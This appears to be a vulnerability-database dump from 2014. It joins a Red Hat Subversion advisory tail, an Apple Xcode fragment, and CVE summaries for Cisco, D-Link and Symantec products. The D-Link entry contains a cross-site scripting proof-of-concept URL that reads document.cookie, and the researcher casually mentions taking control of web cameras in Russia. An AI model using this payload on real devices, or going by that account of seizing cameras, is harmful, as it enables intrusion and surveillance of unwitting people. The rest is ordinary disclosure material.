subversion-kde-1.7.14-7.el7_0.i686.rpm
subversion-kde-1.7.14-7.el7_0.x86_64.rpm
subversion-perl-1.7.14-7.el7_0.i686.rpm
subversion-perl-1.7.14-7.el7_0.x86_64.rpm
subversion-python-1.7.14-7.el7_0.x86_64.rpm
subversion-ruby-1.7.14-7.el7_0.i686.rpm
subversion-ruby-1.7.14-7.el7_0.x86_64.rpm
subversion-tools-1.7.14-7.el7_0.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
subversion-1.7.14-7.el7_0.src.rpm
x86_64:
mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm
subversion-1.7.14-7.el7_0.x86_64.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-libs-1.7.14-7.el7_0.i686.rpm
subversion-libs-1.7.14-7.el7_0.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
subversion-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-devel-1.7.14-7.el7_0.i686.rpm
subversion-devel-1.7.14-7.el7_0.x86_64.rpm
subversion-gnome-1.7.14-7.el7_0.i686.rpm
subversion-gnome-1.7.14-7.el7_0.x86_64.rpm
subversion-javahl-1.7.14-7.el7_0.i686.rpm
subversion-javahl-1.7.14-7.el7_0.x86_64.rpm
subversion-kde-1.7.14-7.el7_0.i686.rpm
subversion-kde-1.7.14-7.el7_0.x86_64.rpm
subversion-perl-1.7.14-7.el7_0.i686.rpm
subversion-perl-1.7.14-7.el7_0.x86_64.rpm
subversion-python-1.7.14-7.el7_0.x86_64.rpm
subversion-ruby-1.7.14-7.el7_0.i686.rpm
subversion-ruby-1.7.14-7.el7_0.x86_64.rpm
subversion-tools-1.7.14-7.el7_0.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-3528
https://access.redhat.com/security/cve/CVE-2014-3580
https://access.redhat.com/security/cve/CVE-2014-8108
https://access.redhat.com/security/updates/classification/#moderate
https://subversion.apache.org/security/CVE-2014-3528-advisory.txt
https://subversion.apache.org/security/CVE-2014-3580-advisory.txt
https://subversion.apache.org/security/CVE-2014-8108-advisory.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFU2pCEXlSAg2UNWIIRAmlpAJ4o2MhM6glIBctGbU52rfN8EZXCDgCdEIll
KM6EsnQkXd09uLTe1k+tQaU=
=CuZg
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
These issues were addressed by updating Apache Subversion to version
1.7.19.
CVE-ID
CVE-2014-3522
CVE-2014-3528
CVE-2014-3580
CVE-2014-8108
Git
Available for: OS X Mavericks v10.9.4 or later
Impact: Synching with a malicious git repository may allow
unexpected files to be added to the .git folder
Description: The checks involved in disallowed paths did not account
for case insensitivity or unicode characters. This issue was
addressed by adding additional checks.
CVE-ID
CVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of
Mercurial
Xcode 6.2 may be obtained from:
https://developer.apple.com/xcode/downloads/
To check that the Xcode has been updated:
* Select Xcode in the menu bar
* Select About Xcode
* The version after applying this update will be "6.2"
| VAR-201412-0295 | CVE-2014-8012 | Cisco Adaptive Security Appliance Software WebVPN Portal login page cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the WebVPN Portal Login page in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web script or HTML via crafted attributes in a cookie, aka Bug ID CSCuh24695.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCuh24695
| VAR-201412-0300 | CVE-2014-8014 | Cisco IOS XR Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco IOS XR allows remote attackers to cause a denial of service (RSVP process reload) via a malformed RSVP packet, aka Bug ID CSCub63710. Vendors have confirmed this vulnerability Bug ID CSCub63710 It is released as. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. http://cwe.mitre.org/data/definitions/19.htmlService disruption by a third party (RSVP Reload process ) There is a possibility of being put into a state. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches
| VAR-201501-0654 | CVE-2014-9517 | D-link IP camera DCS-2103 Firmware cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in D-link IP camera DCS-2103 with firmware before 1.20 allows remote attackers to inject arbitrary web script or HTML via the QUERY_STRING to vb.htm. D-link IP camera The DCS-2103 is a camera for IP surveillance solutions. Dcs-2103 Hd Cube Network Camera is prone to a cross-site scripting vulnerability. If previous Path Traversal and Full path disclosure
vulnerabilities were post-auth, then these BF and XSS vulnerabilities are
pre-auth.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. For BF
vulnerability version 1.20 and previous versions are vulnerable.
Developers refused to fix BF vulnerability (they think that it's problem of
a user to have strong password) and XSS vulnerability was fixed in firmware
version 1.20.
----------
Details:
----------
Brute Force (WASC-11):
http://site
No protection from BF attacks.
Cross-Site Scripting (WASC-08):
http://site/vb.htm?%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
------------
Timeline:
------------
2014.05.22-2014.11.26 - conversation with D-Link about vulnerabilities in
DAP-1360.
2014.08.01 - announced at my site about vulnerabilities in DCS-2103.
2014.11.14-2014.12.13 - conversation with D-Link about vulnerabilities in
DCS-2103.
2014.12.16 - disclosed at my site (http://websecurity.com.ua/7288/).
I found this and other web cameras during summer to watch terrorists
activities in Donetsk and Lugansks regions of Ukraine
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-November/009062.html)
and also I took under control web cameras in Russia
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-December/009065.html).
Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
| VAR-201412-0596 | CVE-2014-7285 | Symantec Web Gateway Any management console running on the appliance OS Command execution vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
The management console on the Symantec Web Gateway (SWG) appliance before 5.2.2 allows remote authenticated users to execute arbitrary OS commands by injecting command strings into unspecified PHP scripts. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. Symantec Web Gateway is prone to a command-injection vulnerability.
Successfully exploiting this issue may allow an attacker to execute arbitrary OS commands in the context of the affected appliance.
Versions prior to Symantec Web Gateway 5.2.2 are vulnerable. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more
| VAR-201412-0291 | CVE-2014-8006 | Cisco ISB8320-E High-Definition IP-Only DVR of Disaster Recovery Vulnerabilities that bypass authentication in functions |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The Disaster Recovery (DRA) feature on the Cisco ISB8320-E High-Definition IP-Only DVR allows remote attackers to bypass authentication by establishing a TELNET session during a recovery boot, aka Bug ID CSCup85422. The Cisco ISB8320-E High-Definition IP-Only DVR is a Cisco HD DVR. Cisco ISB8320-E High-Definition IP-Only DVR has a security vulnerability that could allow an attacker to exploit this vulnerability to bypass certain security restrictions or to perform unauthorized access on an affected device.
This issue is tracked by Cisco Bug ID CSCup85422